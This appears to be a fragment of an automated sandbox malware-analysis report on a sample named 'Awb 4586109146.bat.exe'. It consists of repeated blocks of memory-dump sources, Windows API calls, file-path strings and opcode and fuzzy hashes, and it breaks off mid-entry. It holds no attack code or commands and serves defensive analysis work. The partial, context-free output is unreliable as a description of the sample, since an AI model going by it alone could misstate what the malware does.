                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                    • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                                                    • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                    • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75573420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
                                                                    • GlobalFree.KERNEL32(?), ref: 00403936
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403927
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Free$GlobalLibrary
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 1100898210-4083868402
                                                                    • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                    • Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
                                                                    • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                    • Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Awb 4586109146.bat.exe,C:\Users\user\Desktop\Awb 4586109146.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BE1
                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Awb 4586109146.bat.exe,C:\Users\user\Desktop\Awb 4586109146.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BF1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CharPrevlstrlen
                                                                    • String ID: C:\Users\user\Desktop
                                                                    • API String ID: 2709904686-1876063424
                                                                    • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                    • Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
                                                                    • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                    • Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 7396116A
                                                                    • GlobalFree.KERNEL32(00000000), ref: 739611C7
                                                                    • GlobalFree.KERNEL32(00000000), ref: 739611D9
                                                                    • GlobalFree.KERNEL32(?), ref: 73961203
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true
                                                                    • Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Global$Free$Alloc
                                                                    • String ID:
                                                                    • API String ID: 1780285237-0
                                                                    • Opcode ID: d9dbfd20df08c0910949617700bafc3a3cbd00618dcc498f153ac797ccaddcc2
                                                                    • Instruction ID: 0aef42c666cc22a61dbc603319dc77b09ba9d8214e781910fc98e77db988963c
                                                                    • Opcode Fuzzy Hash: d9dbfd20df08c0910949617700bafc3a3cbd00618dcc498f153ac797ccaddcc2
                                                                    • Instruction Fuzzy Hash: D33190B290B211EFE7009F76C945B36B7FCEB45354B15052EE84ADF254E738D8418BA2
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                                    • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                    • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                                    • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                    • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfe5fadde05909753a802881250d8f946435f49a51cef9ac56d829ab26859170
                                                                    • Instruction ID: 0eb064dd5693db4f599e245c03712e11626d1b639090e4dd966e03e8fbd1a20f
                                                                    • Opcode Fuzzy Hash: cfe5fadde05909753a802881250d8f946435f49a51cef9ac56d829ab26859170
                                                                    • Instruction Fuzzy Hash: 6D230831D10B598ADB11EF68C88469DF7B1FF99300F51C79AE458B7221EB70AAC5CB81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \Vin
                                                                    • API String ID: 0-3600523701
                                                                    • Opcode ID: 0ac505524db50c194e2f3eab035f394abe980a1d776ae05fd4a6f7d290a4b7d8
                                                                    • Instruction ID: c736f1926898f70501ce3150446278d71f2469d1f2f804d367135e16435e572a
                                                                    • Opcode Fuzzy Hash: 0ac505524db50c194e2f3eab035f394abe980a1d776ae05fd4a6f7d290a4b7d8
                                                                    • Instruction Fuzzy Hash: 32918370E00209CFDF14DFA9C9857DDBBF2AF88305F148529E824EB294DB749989CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1a09aa0c71fc0ddc9ca597a0e80ced552b934b6bdbaeed810400f62bd14b5bb9
                                                                    • Instruction ID: a2e44a355a20b02032bbcd0b769f4eb339a96e8618df89099239daec63fb8675
                                                                    • Opcode Fuzzy Hash: 1a09aa0c71fc0ddc9ca597a0e80ced552b934b6bdbaeed810400f62bd14b5bb9
                                                                    • Instruction Fuzzy Hash: 21A23638A042948FEB10DF68C584B9DB7F2FB49354F5485A9D449AB3A2DB35EC82CF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9c17882881876f55e58fd141affeab906efbd08a7d1b498899aadf91b5331bc9
                                                                    • Instruction ID: f72d881bc99d9c2c104358d6ecf64af9d1631afca7184b64de2ad53bf20954c1
                                                                    • Opcode Fuzzy Hash: 9c17882881876f55e58fd141affeab906efbd08a7d1b498899aadf91b5331bc9
                                                                    • Instruction Fuzzy Hash: 07629D34A04299DFEB04EB68D585B9DB7B2FF88355F108569D806EB391DB35EC42CB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 857cbf744a026164505f2537b52dd3831d80cc3151898f647b86f4b38324dcf0
                                                                    • Instruction ID: 8904a8af2a856cc51d8dd77b4717b8d1c8a329809e14bc9c12d837078b6dc0bb
                                                                    • Opcode Fuzzy Hash: 857cbf744a026164505f2537b52dd3831d80cc3151898f647b86f4b38324dcf0
                                                                    • Instruction Fuzzy Hash: C7327E74B042999FFB04DB68D891A9EB7F2FB89350F108529E805EB351DB35EC42CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 13bab17fa93aedef65e646f55603650ad39f83630af274b375306351f700462e
                                                                    • Instruction ID: 10260d1c9aa64469c0ba6995afff77f80994e1b6f4e3ad754ae23bd0406b8301
                                                                    • Opcode Fuzzy Hash: 13bab17fa93aedef65e646f55603650ad39f83630af274b375306351f700462e
                                                                    • Instruction Fuzzy Hash: 6C121739F042A59FEB10DF64C88479EB7B2EF89350F1085AAD846DB341DA75EC42CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e909beeb7f9119ec1f6d46dcb6f510efabee75db5607e18ef4dbaf76982cbc0b
                                                                    • Instruction ID: 9b791e3925a47a820c1775673c68d821153de7c06a1d31a97a79905433e229bb
                                                                    • Opcode Fuzzy Hash: e909beeb7f9119ec1f6d46dcb6f510efabee75db5607e18ef4dbaf76982cbc0b
                                                                    • Instruction Fuzzy Hash: ED229774A042AA9FFB14CB78C49179DB7B2FB8D350F60452AE425E7391CB35EC418B51
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1c7a29e49966f0a4f474b72b00bcd0e79b92ef7b72fbede2c7edcd1155bce6b7
                                                                    • Instruction ID: be4a4b0d23cb6486ac026793451764cda79c150013eb15fea472726d37dc8263
                                                                    • Opcode Fuzzy Hash: 1c7a29e49966f0a4f474b72b00bcd0e79b92ef7b72fbede2c7edcd1155bce6b7
                                                                    • Instruction Fuzzy Hash: 49322F34E1475ACFDB14EB75C89059DB7B1FFC9300F60C6AAD449A7264EB30A986CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a270763becb40f99a2df49820bad56ea736af5bd95af029fbdc591e53eb858d2
                                                                    • Instruction ID: 489681c0de86234065b5bb4e823763c80232701dbfd0135ff34a3919ca5305c0
                                                                    • Opcode Fuzzy Hash: a270763becb40f99a2df49820bad56ea736af5bd95af029fbdc591e53eb858d2
                                                                    • Instruction Fuzzy Hash: 6C027C34B04265CFEB04DB68D891A9EB7E2FF88350F548529E815EB391DB35ED42CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2065287f25f9f094d9ab00ca6edfc8d83069448d241ba268459f1d2f957dccbb
                                                                    • Instruction ID: 0bf6cf258425b76b351baa27aa50b16fff1fb64bf424e8aa9517078f0e24d886
                                                                    • Opcode Fuzzy Hash: 2065287f25f9f094d9ab00ca6edfc8d83069448d241ba268459f1d2f957dccbb
                                                                    • Instruction Fuzzy Hash: EBB15670E00209CFDF14CFA9C8957DDBBF2AF88719F148529D825EB254EB749885CB81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: XM$XM
                                                                    • API String ID: 0-1114951136
                                                                    • Opcode ID: a142234fc399bd7dede6bbe9bafcc3664e032cad27eac8ab28909475f63667b9
                                                                    • Instruction ID: 752c2bb26d6e2f8b42c1c2e391974886cf826d2982a6154cad2e36dbae28edbf
                                                                    • Opcode Fuzzy Hash: a142234fc399bd7dede6bbe9bafcc3664e032cad27eac8ab28909475f63667b9
                                                                    • Instruction Fuzzy Hash: 8DE18234A0435ACFEB15DFA4D49169EB7B2FF88301F208629D815EB754DB35A846CB81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \Vin$\Vin
                                                                    • API String ID: 0-241749244
                                                                    • Opcode ID: 22a8325c357070d887f607bec4d4d14d2de42beebe09f697eea38f92fc75655e
                                                                    • Instruction ID: 2aa0e95e17c1fefb188db9c38227eaf46c145db97412cb1d81db0fd14edc3e8a
                                                                    • Opcode Fuzzy Hash: 22a8325c357070d887f607bec4d4d14d2de42beebe09f697eea38f92fc75655e
                                                                    • Instruction Fuzzy Hash: 98717F70E00349CFDF14DFA9C88579EBBF2BF88719F148129E825AB254DB749885CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \Vin$\Vin
                                                                    • API String ID: 0-241749244
                                                                    • Opcode ID: f717c41f471cee96ff3af081b92884d90c99721c6a8506ab461b2f3da8e00af4
                                                                    • Instruction ID: 36a8c4e8855e3a95ccf67a6741af449030f73a160fd66ff9ae77220663276efc
                                                                    • Opcode Fuzzy Hash: f717c41f471cee96ff3af081b92884d90c99721c6a8506ab461b2f3da8e00af4
                                                                    • Instruction Fuzzy Hash: 95717E70E00249CFDF14DFA9C88579EBBF1BF88719F148129E825AB254DB749889CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \Vin
                                                                    • API String ID: 0-3600523701
                                                                    • Opcode ID: 1d9d324c50c902e7767b6c7238caec7bf10ca796a51933e48713a2122d57b3ac
                                                                    • Instruction ID: 74c9f048adc6bdaa74ba6e871eaccfc3fbc9fd07cfa1ae25e4ec89c36d37a665
                                                                    • Opcode Fuzzy Hash: 1d9d324c50c902e7767b6c7238caec7bf10ca796a51933e48713a2122d57b3ac
                                                                    • Instruction Fuzzy Hash: 94918170E00209CFDF10DFA8C9857DDBBF1AF48305F248529E825EB294D7749989CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c5696fa346194dec0bb371ed1407bf22039f5afc5db664c73b4fbed8335b220b
                                                                    • Instruction ID: 8972c84a28508110d8c6d2a5f1c91582edf0aa4327ceb6e96a207db3b68fd787
                                                                    • Opcode Fuzzy Hash: c5696fa346194dec0bb371ed1407bf22039f5afc5db664c73b4fbed8335b220b
                                                                    • Instruction Fuzzy Hash: 8262BD3160435A9FEB04DB68D581A4EB7B2FFC9350F208A29D805AF355DB36ED46CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3f6d9e173964700e13966bcf72f6bf9eca21aeaca48db89107ca84daaf6927ef
                                                                    • Instruction ID: 27953de217b2854015401b226ff3610632cad716cf7b75052325b39dccb71709
                                                                    • Opcode Fuzzy Hash: 3f6d9e173964700e13966bcf72f6bf9eca21aeaca48db89107ca84daaf6927ef
                                                                    • Instruction Fuzzy Hash: 8E228030701216AFEB15AB38D85226973A2FBC6706B504A3EE806DF355CF75DC879B81
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4d70d20995373bd81903a8f33e22cf2b5802032867c71fdbdcb66bf922d0c10d
                                                                    • Instruction ID: 1f5102add3ab06c31249cae4a57611c6f00017eb9e3f68535a364646d30dcd2a
                                                                    • Opcode Fuzzy Hash: 4d70d20995373bd81903a8f33e22cf2b5802032867c71fdbdcb66bf922d0c10d
                                                                    • Instruction Fuzzy Hash: 60127030701216AFEB15AB28D85226873A2FBC5706B604A3EE806DF355CF75DC479B81
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 61dab77e7adf8940ddede03544ad06402835d87be466a38d0309d793db1d7b92
                                                                    • Instruction ID: 6cfc6b127386d845c5c9ac2a1ad3b5652a19561aa0e07958d1bc1e96b9b94934
                                                                    • Opcode Fuzzy Hash: 61dab77e7adf8940ddede03544ad06402835d87be466a38d0309d793db1d7b92
                                                                    • Instruction Fuzzy Hash: 3B129F30701206AFEB15AB28D85226873A3FBC6706B604A3EE806DF355CF75DC479B81
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f200e4aa60df4b3914de7b3d562a0a8299447abf70fbe3b4eab092c93c719c59
                                                                    • Instruction ID: 423eab0881aed77137b5dc2f5082421feec9d79cb6a9953ab20731d45741b3ee
                                                                    • Opcode Fuzzy Hash: f200e4aa60df4b3914de7b3d562a0a8299447abf70fbe3b4eab092c93c719c59
                                                                    • Instruction Fuzzy Hash: 77029134A042AA9FEB14CF78C48579DB7B2FB89350F10862AD425EB351DB35ED42CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad69f8ca5f805ec04f026a48fd1fe6bccc9776779852f5550c4c51764dc41bf2
                                                                    • Instruction ID: a017b234b44c2cee7c9738e5d3dc3d25de5626eca3de5281e69082e65b587b06
                                                                    • Opcode Fuzzy Hash: ad69f8ca5f805ec04f026a48fd1fe6bccc9776779852f5550c4c51764dc41bf2
                                                                    • Instruction Fuzzy Hash: 9B41ED30A08349CFDB158BA5D8567AEBBB1FF86301F14446AEC21EF290E7709C4A8B51
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c88a206200ff502409121f88c2905c8a753a3180c4cc71771b9c5f31b7fc0122
                                                                    • Instruction ID: 1cd4b55740d44c981b1b841ea2c9381ad3c0c6a497a6e21774af031344c1e6af
                                                                    • Opcode Fuzzy Hash: c88a206200ff502409121f88c2905c8a753a3180c4cc71771b9c5f31b7fc0122
                                                                    • Instruction Fuzzy Hash: E0E1A430A40205CFDB14DB68D894AADBBB2FF88312F648625EC16EB361DB31DD46CB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
